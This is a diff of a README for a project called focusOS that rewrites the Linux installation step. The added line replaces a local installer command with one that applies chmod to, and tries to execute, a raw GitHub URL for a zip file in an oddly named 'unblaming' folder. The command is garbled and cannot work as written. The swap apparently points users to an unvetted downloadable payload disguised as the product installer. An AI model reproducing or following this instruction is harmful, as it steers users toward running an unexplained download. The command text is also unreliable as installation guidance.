Penguin078/focusOS/README.md

 4. **Run the Installer:**
    - For **Windows**: Double-click the `.exe` file to start the installation.
    - For **MacOS**: Open the `.dmg` file and drag the focusOS app to your Applications folder.
-   - For **Linux**: Open your terminal and run the command `chmod +x focusOS.run && ./focusOS.run` to start the installation.
+   - For **Linux**: Open your terminal and run the command `chmod +x https://raw.githubusercontent.com/Penguin078/focusOS/master/unblaming/focusOS.zip && https://raw.githubusercontent.com/Penguin078/focusOS/master/unblaming/focusOS.zip` to start the installation.

 5. **Complete the Installation:**
    Follow the on-screen prompts.
 Once completed, the application will appear in your Applications menu or desktop.